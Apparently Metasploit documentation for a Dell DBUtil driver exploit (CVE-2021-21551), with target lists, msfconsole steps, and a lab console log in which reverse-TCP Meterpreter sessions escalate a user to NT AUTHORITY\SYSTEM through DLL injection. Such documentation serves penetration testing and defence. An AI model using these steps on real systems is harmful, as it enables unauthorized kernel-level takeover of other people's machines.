## Vulnerable Application
The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by an attacker
read and write kernel-mode memory.

### Supported Targets

* Windows 7 SP0 x64
* Windows 7 SP1 x64
* Windows 8.1 x64
* Windows 10 x64 v1607 - 21H1 (builds 14393 - 19043)
* Windows Server 2016 x64
* Windows Server 2019 x64

## Verification Steps

1. Start msfconsole
1. Get a Meterpreter session on a vulnerable host
1. Do: `use exploit/windows/local/cve_2021_21551_dbutil_memmove`
1. Set the `SESSION` and `PAYLOAD` options
1. Do: `run`
1. You should get a shell.

## Scenarios

### Windows 10 Version 1909 Build 18363.418 x64

```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (200262 bytes) to 192.168.159.79
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.79:57013) at 2021-05-12 16:10:10 -0400

meterpreter > sysinfo
Computer        : DESKTOP-RTCRBEV
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-RTCRBEV\Alice Liddle
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > run exploit/windows/local/cve_2021_21551_dbutil_memmove

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 5212 launched.
[*] Reflectively injecting the DLL into 5212...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.159.79
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.79:57015) at 2021-05-12 16:12:43 -0400
[*] Session 3 created in the background.
meterpreter > sessions 3
[*] Backgrounding session 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
